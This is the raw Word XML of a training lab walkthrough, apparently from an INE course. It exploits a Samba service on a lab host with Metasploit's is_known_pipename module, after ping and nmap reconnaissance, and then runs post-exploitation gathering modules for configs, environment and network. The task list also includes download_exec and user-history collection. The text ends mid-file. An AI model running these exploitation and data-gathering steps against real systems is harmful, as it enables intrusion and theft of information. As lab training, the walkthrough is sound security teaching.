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F8376" w14:textId="61BC63C9" w:rsidR="00853ABF" w:rsidRDefault="00312D31">
      <w:r w:rsidRPr="00312D31">
        <w:t>Post Exploitation Lab I</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FC06AF" w14:textId="77777777" w:rsidR="00312D31" w:rsidRDefault="00312D31"/>
    <w:p w14:paraId="439D2737" w14:textId="77777777" w:rsidR="00312D31" w:rsidRPr="00312D31" w:rsidRDefault="00312D31" w:rsidP="00312D31">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312D31">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF63D1F" w14:textId="77777777" w:rsidR="00312D31" w:rsidRPr="00312D31" w:rsidRDefault="00312D31" w:rsidP="00312D31">
      <w:r w:rsidRPr="00312D31">
        <w:t>In this lab, the target machine is running a vulnerable file-sharing service. Exploit it and run the following post modules on the target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4793CDCA" w14:textId="77777777" w:rsidR="00312D31" w:rsidRPr="00312D31" w:rsidRDefault="00312D31" w:rsidP="00312D31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00312D31">
        <w:t>post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00312D31">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00312D31">
        <w:t>/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00312D31">
        <w:t>enum_configs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C4A9E38" w14:textId="77777777" w:rsidR="00312D31" w:rsidRPr="00312D31" w:rsidRDefault="00312D31" w:rsidP="00312D31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00312D31">
        <w:t>post/multi/gather/env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A48A09" w14:textId="77777777" w:rsidR="00312D31" w:rsidRPr="00312D31" w:rsidRDefault="00312D31" w:rsidP="00312D31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00312D31">
        <w:t>post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00312D31">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00312D31">
        <w:t>/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00312D31">
        <w:t>enum_network</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="34503DE2" w14:textId="77777777" w:rsidR="00312D31" w:rsidRPr="00312D31" w:rsidRDefault="00312D31" w:rsidP="00312D31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00312D31">
        <w:t>post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00312D31">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00312D31">
        <w:t>/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00312D31">
        <w:t>enum_protections</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0562CCF0" w14:textId="77777777" w:rsidR="00312D31" w:rsidRPr="00312D31" w:rsidRDefault="00312D31" w:rsidP="00312D31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00312D31">
        <w:t>post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00312D31">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00312D31">
        <w:t>/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00312D31">
        <w:t>enum_system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A5CD1C1" w14:textId="77777777" w:rsidR="00312D31" w:rsidRPr="00312D31" w:rsidRDefault="00312D31" w:rsidP="00312D31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00312D31">
        <w:t>post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00312D31">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00312D31">
        <w:t>/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00312D31">
        <w:t>checkcontainer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="15E7A64B" w14:textId="77777777" w:rsidR="00312D31" w:rsidRPr="00312D31" w:rsidRDefault="00312D31" w:rsidP="00312D31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00312D31">
        <w:t>post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00312D31">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00312D31">
        <w:t>/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00312D31">
        <w:t>checkvm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72E3422A" w14:textId="77777777" w:rsidR="00312D31" w:rsidRPr="00312D31" w:rsidRDefault="00312D31" w:rsidP="00312D31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00312D31">
        <w:t>post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00312D31">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00312D31">
        <w:t>/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00312D31">
        <w:t>enum_users_history</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="136E4AEF" w14:textId="77777777" w:rsidR="00312D31" w:rsidRPr="00312D31" w:rsidRDefault="00312D31" w:rsidP="00312D31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00312D31">
        <w:t>post/multi/manage/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00312D31">
        <w:t>system_session</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="093D681A" w14:textId="77777777" w:rsidR="00312D31" w:rsidRPr="00312D31" w:rsidRDefault="00312D31" w:rsidP="00312D31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00312D31">
        <w:t>post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00312D31">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00312D31">
        <w:t>/manage/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00312D31">
        <w:t>download_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="13CF668B" w14:textId="77777777" w:rsidR="00312D31" w:rsidRPr="00312D31" w:rsidRDefault="00312D31" w:rsidP="00312D31">
      <w:r w:rsidRPr="00312D31">
        <w:t>The target machine will be accessible at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00312D31">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00312D31">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169DA5B6" w14:textId="77777777" w:rsidR="00312D31" w:rsidRPr="00312D31" w:rsidRDefault="00312D31" w:rsidP="00312D31">
      <w:r w:rsidRPr="00312D31">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00312D31">
        <w:t> To exploit a vulnerable file-sharing service on a Linux server and utilize various Metasploit post-exploitation modules to gather critical system data, including configurations, network details, environment variables, and user history, while also assessing system protections and executing commands remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4006FC49" w14:textId="77777777" w:rsidR="00312D31" w:rsidRDefault="00312D31"/>
    <w:p w14:paraId="70B80E57" w14:textId="3FEEEA5C" w:rsidR="000C4275" w:rsidRDefault="000C4275">
      <w:r>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103470B5" w14:textId="77777777" w:rsidR="000C4275" w:rsidRDefault="000C4275"/>
    <w:p w14:paraId="4581710F" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4275">
        <w:t> Open the lab link to access the Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DB17E8" w14:textId="1649DABC" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AFD42AF" wp14:editId="41658DBB">
            <wp:extent cx="5943600" cy="3343910"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="1969976290" name="Picture 36" descr="Conten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 descr="Content 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30CF63" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4275">
        <w:t> Check if the target machine is reachable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7490D3F7" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7320A41D" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t xml:space="preserve">ping -c 4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4644D044" w14:textId="600B3C21" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A0E9FD9" wp14:editId="03B55871">
            <wp:extent cx="5816899" cy="2394073"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1393481194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481194" name="Picture 139348119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6899" cy="2394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6918D" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>The target is reachable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063AA7B1" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4275">
        <w:t> Port scanning with Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133FE022" w14:textId="656C6C79" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t xml:space="preserve">We can now perform a default Nmap port scan on the target to identify the open ports on the target </w:t>
      </w:r>
      <w:r w:rsidRPr="000C4275">
        <w:t>system;</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4275">
        <w:t xml:space="preserve"> this can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14863FFC" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5172E5" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t xml:space="preserve"> -p- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="38B1BEEB" w14:textId="54DB2D1E" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="775ECE0F" wp14:editId="0D705405">
            <wp:extent cx="5785147" cy="2381372"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="144770639" name="Picture 38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70639" name="Picture 38" descr="A screen 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5147" cy="23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5FD70" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4275">
        <w:t> The target machine can be exploited by using exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>/samba/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>is_known_pipename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t xml:space="preserve"> module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190870C8" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DB59E2" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="411419E7" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>/samba/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>is_known_pipename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B3294DA" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t xml:space="preserve">set RHOST </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1E85322F" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E2F762" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>exploit -z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405622EF" w14:textId="0845AD4F" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7416772E" wp14:editId="25A69037">
            <wp:extent cx="5759746" cy="3848298"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1550928297" name="Picture 40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928297" name="Picture 40" descr="A screenshot of a computer screen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746" cy="3848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6F694" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Module 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4275">
        <w:t> post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>enum_configs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2BAE57BF" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Link:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4275">
        <w:t> https://www.rapid7.com/db/modules/post/linux/gather/enum_configs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A68F4E8" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07883CCE" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>use post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>enum_configs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="10915A1E" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333AFBFA" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E17FCE" w14:textId="2C66EC41" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03824942" wp14:editId="6E5C2476">
            <wp:extent cx="5804198" cy="4134062"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="87289362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89362" name="Picture 8728936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4198" cy="4134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107CE" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Module 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4275">
        <w:t> post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>/gather/env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C56159" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Link:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4275">
        <w:t> https://www.rapid7.com/db/modules/post/linux/gather/env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09346263" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AF1548" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>use post/multi/gather/env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD0302B" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D4A043" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D14FE7C" w14:textId="67A041AE" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A0494FE" wp14:editId="5A5AD388">
            <wp:extent cx="5886753" cy="3422826"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1467906353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906353" name="Picture 146790635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6753" cy="3422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3B437" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Module 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4275">
        <w:t> post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>enum_network</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="36D55B4D" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Link:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4275">
        <w:t> https://www.rapid7.com/db/modules/post/linux/gather/enum_network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321C7117" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082B4A36" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>use post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>enum_network</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7FCABEB3" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2002C500" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254C611A" w14:textId="4E46DFFD" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
